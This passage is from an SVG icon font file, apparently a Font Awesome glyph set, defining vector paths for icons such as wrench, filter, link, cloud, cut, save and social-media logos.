q-13 0 -15 1q1 3 2.5 17.5t3.5 22.5q1 4 5.5 12t7.5 14.5t4 12.5t-4.5 9.5t-17.5 2.5q-19 -1 -26 -20q-1 -3 -3 -10.5t-5 -11.5t-9 -7q-7 -3 -24 -2t-24 5q-13 8 -22.5 29t-9.5 37q0 10 2.5 26.5t3 25t-5.5 24.5q3 2 9 9.5t10 10.5q2 1 4.5 1.5t4.5 0t4 1.5t3 6q-1 1 -4 3
q-3 3 -4 3q7 -3 28.5 1.5t27.5 -1.5q15 -11 22 2q0 1 -2.5 9.5t-0.5 13.5q5 -27 29 -9q3 -3 15.5 -5t17.5 -5q3 -2 7 -5.5t5.5 -4.5t5 0.5t8.5 6.5q10 -14 12 -24q11 -40 19 -44q7 -3 11 -2t4.5 9.5t0 14t-1.5 12.5l-1 8v18l-1 8q-15 3 -18.5 12t1.5 18.5t15 18.5q1 1 8 3.5
t15.5 6.5t12.5 8q21 19 15 35q7 0 11 9q-1 0 -5 3t-7.5 5t-4.5 2q9 5 2 16q5 3 7.5 11t7.5 10q9 -12 21 -2q8 8 1 16q5 7 20.5 10.5t18.5 9.5q7 -2 8 2t1 12t3 12q4 5 15 9t13 5l17 11q3 4 0 4q18 -2 31 11q10 11 -6 20q3 6 -3 9.5t-15 5.5q3 1 11.5 0.5t10.5 1.5
q15 10 -7 16q-17 5 -43 -12zM879 10q206 36 351 189q-3 3 -12.5 4.5t-12.5 3.5q-18 7 -24 8q1 7 -2.5 13t-8 9t-12.5 8t-11 7q-2 2 -7 6t-7 5.5t-7.5 4.5t-8.5 2t-10 -1l-3 -1q-3 -1 -5.5 -2.5t-5.5 -3t-4 -3t0 -2.5q-21 17 -36 22q-5 1 -11 5.5t-10.5 7t-10 1.5t-11.5 -7
q-5 -5 -6 -15t-2 -13q-7 5 0 17.5t2 18.5q-3 6 -10.5 4.5t-12 -4.5t-11.5 -8.5t-9 -6.5t-8.5 -5.5t-8.5 -7.5q-3 -4 -6 -12t-5 -11q-2 4 -11.5 6.5t-9.5 5.5q2 -10 4 -35t5 -38q7 -31 -12 -48q-27 -25 -29 -40q-4 -22 12 -26q0 -7 -8 -20.5t-7 -21.5q0 -6 2 -16z" />
    <glyph glyph-name="wrench" unicode="&#xf0ad;" horiz-adv-x="1664" 
d="M384 64q0 26 -19 45t-45 19t-45 -19t-19 -45t19 -45t45 -19t45 19t19 45zM1028 484l-682 -682q-37 -37 -90 -37q-52 0 -91 37l-106 108q-38 36 -38 90q0 53 38 91l681 681q39 -98 114.5 -173.5t173.5 -114.5zM1662 919q0 -39 -23 -106q-47 -134 -164.5 -217.5
t-258.5 -83.5q-185 0 -316.5 131.5t-131.5 316.5t131.5 316.5t316.5 131.5q58 0 121.5 -16.5t107.5 -46.5q16 -11 16 -28t-16 -28l-293 -169v-224l193 -107q5 3 79 48.5t135.5 81t70.5 35.5q15 0 23.5 -10t8.5 -25z" />
    <glyph glyph-name="tasks" unicode="&#xf0ae;" horiz-adv-x="1792" 
d="M1024 128h640v128h-640v-128zM640 640h1024v128h-1024v-128zM1280 1152h384v128h-384v-128zM1792 320v-256q0 -26 -19 -45t-45 -19h-1664q-26 0 -45 19t-19 45v256q0 26 19 45t45 19h1664q26 0 45 -19t19 -45zM1792 832v-256q0 -26 -19 -45t-45 -19h-1664q-26 0 -45 19
t-19 45v256q0 26 19 45t45 19h1664q26 0 45 -19t19 -45zM1792 1344v-256q0 -26 -19 -45t-45 -19h-1664q-26 0 -45 19t-19 45v256q0 26 19 45t45 19h1664q26 0 45 -19t19 -45z" />
    <glyph glyph-name="filter" unicode="&#xf0b0;" horiz-adv-x="1408" 
d="M1403 1241q17 -41 -14 -70l-493 -493v-742q0 -42 -39 -59q-13 -5 -25 -5q-27 0 -45 19l-256 256q-19 19 -19 45v486l-493 493q-31 29 -14 70q17 39 59 39h1280q42 0 59 -39z" />
    <glyph glyph-name="briefcase" unicode="&#xf0b1;" horiz-adv-x="1792" 
d="M640 1280h512v128h-512v-128zM1792 640v-480q0 -66 -47 -113t-113 -47h-1472q-66 0 -113 47t-47 113v480h672v-160q0 -26 19 -45t45 -19h320q26 0 45 19t19 45v160h672zM1024 640v-128h-256v128h256zM1792 1120v-384h-1792v384q0 66 47 113t113 47h352v160q0 40 28 68
t68 28h576q40 0 68 -28t28 -68v-160h352q66 0 113 -47t47 -113z" />
    <glyph glyph-name="fullscreen" unicode="&#xf0b2;" 
d="M1283 995l-355 -355l355 -355l144 144q29 31 70 14q39 -17 39 -59v-448q0 -26 -19 -45t-45 -19h-448q-42 0 -59 40q-17 39 14 69l144 144l-355 355l-355 -355l144 -144q31 -30 14 -69q-17 -40 -59 -40h-448q-26 0 -45 19t-19 45v448q0 42 40 59q39 17 69 -14l144 -144
l355 355l-355 355l-144 -144q-19 -19 -45 -19q-12 0 -24 5q-40 17 -40 59v448q0 26 19 45t45 19h448q42 0 59 -40q17 -39 -14 -69l-144 -144l355 -355l355 355l-144 144q-31 30 -14 69q17 40 59 40h448q26 0 45 -19t19 -45v-448q0 -42 -39 -59q-13 -5 -25 -5q-26 0 -45 19z
" />
    <glyph glyph-name="group" unicode="&#xf0c0;" horiz-adv-x="1920" 
d="M593 640q-162 -5 -265 -128h-134q-82 0 -138 40.5t-56 118.5q0 353 124 353q6 0 43.5 -21t97.5 -42.5t119 -21.5q67 0 133 23q-5 -37 -5 -66q0 -139 81 -256zM1664 3q0 -120 -73 -189.5t-194 -69.5h-874q-121 0 -194 69.5t-73 189.5q0 53 3.5 103.5t14 109t26.5 108.5
t43 97.5t62 81t85.5 53.5t111.5 20q10 0 43 -21.5t73 -48t107 -48t135 -21.5t135 21.5t107 48t73 48t43 21.5q61 0 111.5 -20t85.5 -53.5t62 -81t43 -97.5t26.5 -108.5t14 -109t3.5 -103.5zM640 1280q0 -106 -75 -181t-181 -75t-181 75t-75 181t75 181t181 75t181 -75
t75 -181zM1344 896q0 -159 -112.5 -271.5t-271.5 -112.5t-271.5 112.5t-112.5 271.5t112.5 271.5t271.5 112.5t271.5 -112.5t112.5 -271.5zM1920 671q0 -78 -56 -118.5t-138 -40.5h-134q-103 123 -265 128q81 117 81 256q0 29 -5 66q66 -23 133 -23q59 0 119 21.5t97.5 42.5
t43.5 21q124 0 124 -353zM1792 1280q0 -106 -75 -181t-181 -75t-181 75t-75 181t75 181t181 75t181 -75t75 -181z" />
    <glyph glyph-name="link" unicode="&#xf0c1;" horiz-adv-x="1664" 
d="M1456 320q0 40 -28 68l-208 208q-28 28 -68 28q-42 0 -72 -32q3 -3 19 -18.5t21.5 -21.5t15 -19t13 -25.5t3.5 -27.5q0 -40 -28 -68t-68 -28q-15 0 -27.5 3.5t-25.5 13t-19 15t-21.5 21.5t-18.5 19q-33 -31 -33 -73q0 -40 28 -68l206 -207q27 -27 68 -27q40 0 68 26
l147 146q28 28 28 67zM753 1025q0 40 -28 68l-206 207q-28 28 -68 28q-39 0 -68 -27l-147 -146q-28 -28 -28 -67q0 -40 28 -68l208 -208q27 -27 68 -27q42 0 72 31q-3 3 -19 18.5t-21.5 21.5t-15 19t-13 25.5t-3.5 27.5q0 40 28 68t68 28q15 0 27.5 -3.5t25.5 -13t19 -15
t21.5 -21.5t18.5 -19q33 31 33 73zM1648 320q0 -120 -85 -203l-147 -146q-83 -83 -203 -83q-121 0 -204 85l-206 207q-83 83 -83 203q0 123 88 209l-88 88q-86 -88 -208 -88q-120 0 -204 84l-208 208q-84 84 -84 204t85 203l147 146q83 83 203 83q121 0 204 -85l206 -207
q83 -83 83 -203q0 -123 -88 -209l88 -88q86 88 208 88q120 0 204 -84l208 -208q84 -84 84 -204z" />
    <glyph glyph-name="cloud" unicode="&#xf0c2;" horiz-adv-x="1920" 
d="M1920 384q0 -159 -112.5 -271.5t-271.5 -112.5h-1088q-185 0 -316.5 131.5t-131.5 316.5q0 132 71 241.5t187 163.5q-2 28 -2 43q0 212 150 362t362 150q158 0 286.5 -88t187.5 -230q70 62 166 62q106 0 181 -75t75 -181q0 -75 -41 -138q129 -30 213 -134.5t84 -239.5z
" />
    <glyph glyph-name="beaker" unicode="&#xf0c3;" horiz-adv-x="1664" 
d="M1527 88q56 -89 21.5 -152.5t-140.5 -63.5h-1152q-106 0 -140.5 63.5t21.5 152.5l503 793v399h-64q-26 0 -45 19t-19 45t19 45t45 19h512q26 0 45 -19t19 -45t-19 -45t-45 -19h-64v-399zM748 813l-272 -429h712l-272 429l-20 31v37v399h-128v-399v-37z" />
    <glyph glyph-name="cut" unicode="&#xf0c4;" horiz-adv-x="1792" 
d="M960 640q26 0 45 -19t19 -45t-19 -45t-45 -19t-45 19t-19 45t19 45t45 19zM1260 576l507 -398q28 -20 25 -56q-5 -35 -35 -51l-128 -64q-13 -7 -29 -7q-17 0 -31 8l-690 387l-110 -66q-8 -4 -12 -5q14 -49 10 -97q-7 -77 -56 -147.5t-132 -123.5q-132 -84 -277 -84
q-136 0 -222 78q-90 84 -79 207q7 76 56 147t131 124q132 84 278 84q83 0 151 -31q9 13 22 22l122 73l-122 73q-13 9 -22 22q-68 -31 -151 -31q-146 0 -278 84q-82 53 -131 124t-56 147q-5 59 15.5 113t63.5 93q85 79 222 79q145 0 277 -84q83 -52 132 -123t56 -148
q4 -48 -10 -97q4 -1 12 -5l110 -66l690 387q14 8 31 8q16 0 29 -7l128 -64q30 -16 35 -51q3 -36 -25 -56zM579 836q46 42 21 108t-106 117q-92 59 -192 59q-74 0 -113 -36q-46 -42 -21 -108t106 -117q92 -59 192 -59q74 0 113 36zM494 91q81 51 106 117t-21 108
q-39 36 -113 36q-100 0 -192 -59q-81 -51 -106 -117t21 -108q39 -36 113 -36q100 0 192 59zM672 704l96 -58v11q0 36 33 56l14 8l-79 47l-26 -26q-3 -3 -10 -11t-12 -12q-2 -2 -4 -3.5t-3 -2.5zM896 480l96 -32l736 576l-128 64l-768 -431v-113l-160 -96l9 -8q2 -2 7 -6
q4 -4 11 -12t11 -12l26 -26zM1600 64l128 64l-520 408l-177 -138q-2 -3 -13 -7z" />
    <glyph glyph-name="copy" unicode="&#xf0c5;" horiz-adv-x="1792" 
d="M1696 1152q40 0 68 -28t28 -68v-1216q0 -40 -28 -68t-68 -28h-960q-40 0 -68 28t-28 68v288h-544q-40 0 -68 28t-28 68v672q0 40 20 88t48 76l408 408q28 28 76 48t88 20h416q40 0 68 -28t28 -68v-328q68 40 128 40h416zM1152 939l-299 -299h299v299zM512 1323l-299 -299
h299v299zM708 676l316 316v416h-384v-416q0 -40 -28 -68t-68 -28h-416v-640h512v256q0 40 20 88t48 76zM1664 -128v1152h-384v-416q0 -40 -28 -68t-68 -28h-416v-640h896z" />
    <glyph glyph-name="paper_clip" unicode="&#xf0c6;" horiz-adv-x="1408" 
d="M1404 151q0 -117 -79 -196t-196 -79q-135 0 -235 100l-777 776q-113 115 -113 271q0 159 110 270t269 111q158 0 273 -113l605 -606q10 -10 10 -22q0 -16 -30.5 -46.5t-46.5 -30.5q-13 0 -23 10l-606 607q-79 77 -181 77q-106 0 -179 -75t-73 -181q0 -105 76 -181
l776 -777q63 -63 145 -63q64 0 106 42t42 106q0 82 -63 145l-581 581q-26 24 -60 24q-29 0 -48 -19t-19 -48q0 -32 25 -59l410 -410q10 -10 10 -22q0 -16 -31 -47t-47 -31q-12 0 -22 10l-410 410q-63 61 -63 149q0 82 57 139t139 57q88 0 149 -63l581 -581q100 -98 100 -235
z" />
    <glyph glyph-name="save" unicode="&#xf0c7;" 
d="M384 0h768v384h-768v-384zM1280 0h128v896q0 14 -10 38.5t-20 34.5l-281 281q-10 10 -34 20t-39 10v-416q0 -40 -28 -68t-68 -28h-576q-40 0 -68 28t-28 68v416h-128v-1280h128v416q0 40 28 68t68 28h832q40 0 68 -28t28 -68v-416zM896 928v320q0 13 -9.5 22.5t-22.5 9.5
h-192q-13 0 -22.5 -9.5t-9.5 -22.5v-320q0 -13 9.5 -22.5t22.5 -9.5h192q13 0 22.5 9.5t9.5 22.5zM1536 896v-928q0 -40 -28 -68t-68 -28h-1344q-40 0 -68 28t-28 68v1344q0 40 28 68t68 28h928q40 0 88 -20t76 -48l280 -280q28 -28 48 -76t20 -88z" />
    <glyph glyph-name="sign_blank" unicode="&#xf0c8;" 
d="M1536 1120v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
    <glyph glyph-name="reorder" unicode="&#xf0c9;" 
d="M1536 192v-128q0 -26 -19 -45t-45 -19h-1408q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h1408q26 0 45 -19t19 -45zM1536 704v-128q0 -26 -19 -45t-45 -19h-1408q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h1408q26 0 45 -19t19 -45zM1536 1216v-128q0 -26 -19 -45
t-45 -19h-1408q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h1408q26 0 45 -19t19 -45z" />
    <glyph glyph-name="ul" unicode="&#xf0ca;" horiz-adv-x="1792" 
d="M384 128q0 -80 -56 -136t-136 -56t-136 56t-56 136t56 136t136 56t136 -56t56 -136zM384 640q0 -80 -56 -136t-136 -56t-136 56t-56 136t56 136t136 56t136 -56t56 -136zM1792 224v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-1216q-13 0 -22.5 9.5t-9.5 22.5v192q0 13 9.5 22.5
t22.5 9.5h1216q13 0 22.5 -9.5t9.5 -22.5zM384 1152q0 -80 -56 -136t-136 -56t-136 56t-56 136t56 136t136 56t136 -56t56 -136zM1792 736v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-1216q-13 0 -22.5 9.5t-9.5 22.5v192q0 13 9.5 22.5t22.5 9.5h1216q13 0 22.5 -9.5t9.5 -22.5z
M1792 1248v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-1216q-13 0 -22.5 9.5t-9.5 22.5v192q0 13 9.5 22.5t22.5 9.5h1216q13 0 22.5 -9.5t9.5 -22.5z" />
    <glyph glyph-name="ol" unicode="&#xf0cb;" horiz-adv-x="1792" 
d="M381 -84q0 -80 -54.5 -126t-135.5 -46q-106 0 -172 66l57 88q49 -45 106 -45q29 0 50.5 14.5t21.5 42.5q0 64 -105 56l-26 56q8 10 32.5 43.5t42.5 54t37 38.5v1q-16 0 -48.5 -1t-48.5 -1v-53h-106v152h333v-88l-95 -115q51 -12 81 -49t30 -88zM383 543v-159h-362
q-6 36 -6 54q0 51 23.5 93t56.5 68t66 47.5t56.5 43.5t23.5 45q0 25 -14.5 38.5t-39.5 13.5q-46 0 -81 -58l-85 59q24 51 71.5 79.5t105.5 28.5q73 0 123 -41.5t50 -112.5q0 -50 -34 -91.5t-75 -64.5t-75.5 -50.5t-35.5 -52.5h127v60h105zM1792 224v-192q0 -13 -9.5 -22.5
t-22.5 -9.5h-1216q-13 0 -22.5 9.5t-9.5 22.5v192q0 14 9 23t23 9h1216q13 0 22.5 -9.5t9.5 -22.5zM384 1123v-99h-335v99h107q0 41 0.5 121.5t0.5 121.5v12h-2q-8 -17 -50 -54l-71 76l136 127h106v-404h108zM1792 736v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-1216
q-13 0 -22.5 9.5t-9.5 22.5v192q0 14 9 23t23 9h1216q13 0 22.5 -9.5t9.5 -22.5zM1792 1248v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-1216q-13 0 -22.5 9.5t-9.5 22.5v192q0 13 9.5 22.5t22.5 9.5h1216q13 0 22.5 -9.5t9.5 -22.5z" />
    <glyph glyph-name="strikethrough" unicode="&#xf0cc;" horiz-adv-x="1792" 
d="M1760 640q14 0 23 -9t9 -23v-64q0 -14 -9 -23t-23 -9h-1728q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h1728zM483 704q-28 35 -51 80q-48 98 -48 188q0 181 134 309q133 127 393 127q50 0 167 -19q66 -12 177 -48q10 -38 21 -118q14 -123 14 -183q0 -18 -5 -45l-12 -3l-84 6
l-14 2q-50 149 -103 205q-88 91 -210 91q-114 0 -182 -59q-67 -58 -67 -146q0 -73 66 -140t279 -129q69 -20 173 -66q58 -28 95 -52h-743zM990 448h411q7 -39 7 -92q0 -111 -41 -212q-23 -56 -71 -104q-37 -35 -109 -81q-80 -48 -153 -66q-80 -21 -203 -21q-114 0 -195 23
l-140 40q-57 16 -72 28q-8 8 -8 22v13q0 108 -2 156q-1 30 0 68l2 37v44l102 2q15 -34 30 -71t22.5 -56t12.5 -27q35 -57 80 -94q43 -36 105 -57q59 -22 132 -22q64 0 139 27q77 26 122 86q47 61 47 129q0 84 -81 157q-34 29 -137 71z" />
    <glyph glyph-name="underline" unicode="&#xf0cd;" 
d="M48 1313q-37 2 -45 4l-3 88q13 1 40 1q60 0 112 -4q132 -7 166 -7q86 0 168 3q116 4 146 5q56 0 86 2l-1 -14l2 -64v-9q-60 -9 -124 -9q-60 0 -79 -25q-13 -14 -13 -132q0 -13 0.5 -32.5t0.5 -25.5l1 -229l14 -280q6 -124 51 -202q35 -59 96 -92q88 -47 177 -47
q104 0 191 28q56 18 99 51q48 36 65 64q36 56 53 114q21 73 21 229q0 79 -3.5 128t-11 122.5t-13.5 159.5l-4 59q-5 67 -24 88q-34 35 -77 34l-100 -2l-14 3l2 86h84l205 -10q76 -3 196 10l18 -2q6 -38 6 -51q0 -7 -4 -31q-45 -12 -84 -13q-73 -11 -79 -17q-15 -15 -15 -41
q0 -7 1.5 -27t1.5 -31q8 -19 22 -396q6 -195 -15 -304q-15 -76 -41 -122q-38 -65 -112 -123q-75 -57 -182 -89q-109 -33 -255 -33q-167 0 -284 46q-119 47 -179 122q-61 76 -83 195q-16 80 -16 237v333q0 188 -17 213q-25 36 -147 39zM1536 -96v64q0 14 -9 23t-23 9h-1472
q-14 0 -23 -9t-9 -23v-64q0 -14 9 -23t23 -9h1472q14 0 23 9t9 23z" />
    <glyph glyph-name="table" unicode="&#xf0ce;" horiz-adv-x="1664" 
d="M512 160v192q0 14 -9 23t-23 9h-320q-14 0 -23 -9t-9 -23v-192q0 -14 9 -23t23 -9h320q14 0 23 9t9 23zM512 544v192q0 14 -9 23t-23 9h-320q-14 0 -23 -9t-9 -23v-192q0 -14 9 -23t23 -9h320q14 0 23 9t9 23zM1024 160v192q0 14 -9 23t-23 9h-320q-14 0 -23 -9t-9 -23
v-192q0 -14 9 -23t23 -9h320q14 0 23 9t9 23zM512 928v192q0 14 -9 23t-23 9h-320q-14 0 -23 -9t-9 -23v-192q0 -14 9 -23t23 -9h320q14 0 23 9t9 23zM1024 544v192q0 14 -9 23t-23 9h-320q-14 0 -23 -9t-9 -23v-192q0 -14 9 -23t23 -9h320q14 0 23 9t9 23zM1536 160v192
q0 14 -9 23t-23 9h-320q-14 0 -23 -9t-9 -23v-192q0 -14 9 -23t23 -9h320q14 0 23 9t9 23zM1024 928v192q0 14 -9 23t-23 9h-320q-14 0 -23 -9t-9 -23v-192q0 -14 9 -23t23 -9h320q14 0 23 9t9 23zM1536 544v192q0 14 -9 23t-23 9h-320q-14 0 -23 -9t-9 -23v-192
q0 -14 9 -23t23 -9h320q14 0 23 9t9 23zM1536 928v192q0 14 -9 23t-23 9h-320q-14 0 -23 -9t-9 -23v-192q0 -14 9 -23t23 -9h320q14 0 23 9t9 23zM1664 1248v-1088q0 -66 -47 -113t-113 -47h-1344q-66 0 -113 47t-47 113v1088q0 66 47 113t113 47h1344q66 0 113 -47t47 -113
z" />
    <glyph glyph-name="magic" unicode="&#xf0d0;" horiz-adv-x="1664" 
d="M1190 955l293 293l-107 107l-293 -293zM1637 1248q0 -27 -18 -45l-1286 -1286q-18 -18 -45 -18t-45 18l-198 198q-18 18 -18 45t18 45l1286 1286q18 18 45 18t45 -18l198 -198q18 -18 18 -45zM286 1438l98 -30l-98 -30l-30 -98l-30 98l-98 30l98 30l30 98zM636 1276
l196 -60l-196 -60l-60 -196l-60 196l-196 60l196 60l60 196zM1566 798l98 -30l-98 -30l-30 -98l-30 98l-98 30l98 30l30 98zM926 1438l98 -30l-98 -30l-30 -98l-30 98l-98 30l98 30l30 98z" />
    <glyph glyph-name="truck" unicode="&#xf0d1;" horiz-adv-x="1792" 
d="M640 128q0 52 -38 90t-90 38t-90 -38t-38 -90t38 -90t90 -38t90 38t38 90zM256 640h384v256h-158q-13 0 -22 -9l-195 -195q-9 -9 -9 -22v-30zM1536 128q0 52 -38 90t-90 38t-90 -38t-38 -90t38 -90t90 -38t90 38t38 90zM1792 1216v-1024q0 -15 -4 -26.5t-13.5 -18.5
t-16.5 -11.5t-23.5 -6t-22.5 -2t-25.5 0t-22.5 0.5q0 -106 -75 -181t-181 -75t-181 75t-75 181h-384q0 -106 -75 -181t-181 -75t-181 75t-75 181h-64q-3 0 -22.5 -0.5t-25.5 0t-22.5 2t-23.5 6t-16.5 11.5t-13.5 18.5t-4 26.5q0 26 19 45t45 19v320q0 8 -0.5 35t0 38
t2.5 34.5t6.5 37t14 30.5t22.5 30l198 198q19 19 50.5 32t58.5 13h160v192q0 26 19 45t45 19h1024q26 0 45 -19t19 -45z" />
    <glyph glyph-name="pinterest" unicode="&#xf0d2;" 
d="M1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103q-111 0 -218 32q59 93 78 164q9 34 54 211q20 -39 73 -67.5t114 -28.5q121 0 216 68.5t147 188.5t52 270q0 114 -59.5 214t-172.5 163t-255 63q-105 0 -196 -29t-154.5 -77t-109 -110.5t-67 -129.5t-21.5 -134
q0 -104 40 -183t117 -111q30 -12 38 20q2 7 8 31t8 30q6 23 -11 43q-51 61 -51 151q0 151 104.5 259.5t273.5 108.5q151 0 235.5 -82t84.5 -213q0 -170 -68.5 -289t-175.5 -119q-61 0 -98 43.5t-23 104.5q8 35 26.5 93.5t30 103t11.5 75.5q0 50 -27 83t-77 33
q-62 0 -105 -57t-43 -142q0 -73 25 -122l-99 -418q-17 -70 -13 -177q-206 91 -333 281t-127 423q0 209 103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
    <glyph glyph-name="pinterest_sign" unicode="&#xf0d3;" 
d="M1248 1408q119 0 203.5 -84.5t84.5 -203.5v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-725q85 122 108 210q9 34 53 209q21 -39 73.5 -67t112.5 -28q181 0 295.5 147.5t114.5 373.5q0 84 -35 162.5t-96.5 139t-152.5 97t-197 36.5q-104 0 -194.5 -28.5t-153 -76.5
t-107.5 -109.5t-66.5 -128t-21.5 -132.5q0 -102 39.5 -180t116.5 -110q13 -5 23.5 0t14.5 19q10 44 15 61q6 23 -11 42q-50 62 -50 150q0 150 103.5 256.5t270.5 106.5q149 0 232.5 -81t83.5 -210q0 -168 -67.5 -286t-173.5 -118q-60 0 -97 43.5t-23 103.5q8 34 26.5 92.5
t29.5 102t11 74.5q0 49 -26.5 81.5t-75.5 32.5q-61 0 -103.5 -56.5t-42.5 -139.5q0 -72 24 -121l-98 -414q-24 -100 -7 -254h-183q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960z" />
    <glyph glyph-name="google_plus_sign" unicode="&#xf0d4;" 
d="M917 631q0 26 -6 64h-362v-132h217q-3 -24 -16.5 -50t-37.5 -53t-66.5 -44.5t-96.5 -17.5q-99 0 -169 71t-70 171t70 171t169 71q92 0 153 -59l104 101q-108 100 -257 100q-160 0 -272 -112.5t-112 -271.5t112 -271.5t272 -112.5q165 0 266.5 105t101.5 270zM1262 585
h109v110h-109v110h-110v-110h-110v-110h110v-110h110v110zM1536 1120v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
    <glyph glyph-name="google_plus" unicode="&#xf0d5;" horiz-adv-x="2304" 
d="M1437 623q0 -208 -87 -370.5t-248 -254t-369 -91.5q-149 0 -285 58t-234 156t-156 234t-58 285t58 285t156 234t234 156t285 58q286 0 491 -192l-199 -191q-117 113 -292 113q-123 0 -227.5 -62t-165.5 -168.5t-61 -232.5t61 -232.5t165.5 -168.5t227.5 -62
q83 0 152.5 23t114.5 57.5t78.5 78.5t49 83t21.5 74h-416v252h692q12 -63 12 -122zM2304 745v-210h-209v-209h-210v209h-209v210h209v209h210v-209h209z" />
    <glyph glyph-name="money" unicode="&#xf0d6;" horiz-adv-x="1920" 
d="M768 384h384v96h-128v448h-114l-148 -137l77 -80q42 37 55 57h2v-288h-128v-96zM1280 640q0 -70 -21 -142t-59.5 -134t-101.5 -101t-138 -39t-138 39t-101.5 101t-59.5 134t-21 142t21 142t59.5 134t101.5 101t138 39t138 -39t101.5 -101t59.5 -134t21 -142zM1792 384
v512q-106 0 -181 75t-75 181h-1152q0 -106 -75 -181t-181 -75v-512q106 0 181 -75t75 -181h1152q0 106 75 181t181 75zM1920 1216v-1152q0 -26 -19 -45t-45 -19h-1792q-26 0 -45 19t-19 45v1152q0 26 19 45t45 19h1792q26 0 45 -19t19 -45z" />
    <glyph glyph-name="caret_down" unicode="&#xf0d7;" horiz-adv-x="1024" 
d="M1024 832q0 -26 -19 -45l-448 -448q-19 -19 -45 -19t-45 19l-448 448q-19 19 -19 45t19 45t45 19h896q26 0 45 -19t19 -45z" />
    <glyph glyph-name="caret_up" unicode="&#xf0d8;" horiz-adv-x="1024" 
d="M1024 320q0 -26 -19 -45t-45 -19h-896q-26 0 -45 19t-19 45t19 45l448 448q19 19 45 19t45 -19l448 -448q19 -19 19 -45z" />
    <glyph glyph-name="caret_left" unicode="&#xf0d9;" horiz-adv-x="640" 
d="M640 1088v-896q0 -26 -19 -45t-45 -19t-45 19l-448 448q-19 19 -19 45t19 45l448 448q19 19 45 19t45 -19t19 -45z" />
    <glyph glyph-name="caret_right" unicode="&#xf0da;" horiz-adv-x="640" 
d="M576 640q0 -26 -19 -45l-448 -448q-19 -19 -45 -19t-45 19t-19 45v896q0 26 19 45t45 19t45 -19l448 -448q19 -19 19 -45z" />
    <glyph glyph-name="columns" unicode="&#xf0db;" horiz-adv-x="1664" 
d="M160 0h608v1152h-640v-1120q0 -13 9.5 -22.5t22.5 -9.5zM1536 32v1120h-640v-1152h608q13 0 22.5 9.5t9.5 22.5zM1664 1248v-1216q0 -66 -47 -113t-113 -47h-1344q-66 0 -113 47t-47 113v1216q0 66 47 113t113 47h1344q66 0 113 -47t47 -113z" />
    <glyph glyph-name="sort" unicode="&#xf0dc;" horiz-adv-x="1024" 
d="M1024 448q0 -26 -19 -45l-448 -448q-19 -19 -45 -19t-45 19l-448 448q-19 19 -19 45t19 45t45 19h896q26 0 45 -19t19 -45zM1024 832q0 -26 -19 -45t-45 -19h-896q-26 0 -45 19t-19 45t19 45l448 448q19 19 45 19t45 -19l448 -448q19 -19 19 -45z" />
    <glyph glyph-name="sort_down" unicode="&#xf0dd;" horiz-adv-x="1024" 
d="M1024 448q0 -26 -19 -45l-448 -448q-19 -19 -45 -19t-45 19l-448 448q-19 19 -19 45t19 45t45 19h896q26 0 45 -19t19 -45z" />
    <glyph glyph-name="sort_up" unicode="&#xf0de;" horiz-adv-x="1024" 
d="M1024 832q0 -26 -19 -45t-45 -19h-896q-26 0 -45 19t-19 45t19 45l448 448q19 19 45 19t45 -19l448 -448q19 -19 19 -45z" />
    <glyph glyph-name="envelope_alt" unicode="&#xf0e0;" horiz-adv-x="1792" 
d="M1792 826v-794q0 -66 -47 -113t-113 -47h-1472q-66 0 -113 47t-47 113v794q44 -49 101 -87q362 -246 497 -345q57 -42 92.5 -65.5t94.5 -48t110 -24.5h1h1q51 0 110 24.5t94.5 48t92.5 65.5q170 123 498 345q57 39 100 87zM1792 1120q0 -79 -49 -151t-122 -123
q-376 -261 -468 -325q-10 -7 -42.5 -30.5t-54 -38t-52 -32.5t-57.5 -27t-50 -9h-1h-1q-23 0 -50 9t-57.5 27t-52 32.5t-54 38t-42.5 30.5q-91 64 -262 182.5t-205 142.5q-62 42 -117 115.5t-55 136.5q0 78 41.5 130t118.5 52h1472q65 0 112.5 -47t47.5 -113z" />
    <glyph glyph-name="linkedin" unicode="&#xf0e1;" 
d="M349 911v-991h-330v991h330zM370 1217q1 -73 -50.5 -122t-135.5 -49h-2q-82 0 -132 49t-50 122q0 74 51.5 122.5t134.5 48.5t133 -48.5t51 -122.5zM1536 488v-568h-329v530q0 105 -40.5 164.5t-126.5 59.5q-63 0 -105.5 -34.5t-63.5 -85.5q-11 -30 -11 -81v-553h-329
q2 399 2 647t-1 296l-1 48h329v-144h-2q20 32 41 56t56.5 52t87 43.5t114.5 15.5q171 0 275 -113.5t104 -332.5z" />
    <glyph glyph-name="undo" unicode="&#xf0e2;" 
d="M1536 640q0 -156 -61 -298t-164 -245t-245 -164t-298 -61q-172 0 -327 72.5t-264 204.5q-7 10 -6.5 22.5t8.5 20.5l137 138q10 9 25 9q16 -2 23 -12q73 -95 179 -147t225 -52q104 0 198.5 40.5t163.5 109.5t109.5 163.5t40.5 198.5t-40.5 198.5t-109.5 163.5
t-163.5 109.5t-198.5 40.5q-98 0 -188 -35.5t-160 -101.5l137 -138q31 -30 14 -69q-17 -40 -59 -40h-448q-26 0 -45 19t-19 45v448q0 42 40 59q39 17 69 -14l130 -129q107 101 244.5 156.5t284.5 55.5q156 0 298 -61t245 -164t164 -245t61 -298z" />
    <glyph glyph-name="legal" unicode="&#xf0e3;" horiz-adv-x="1792" 
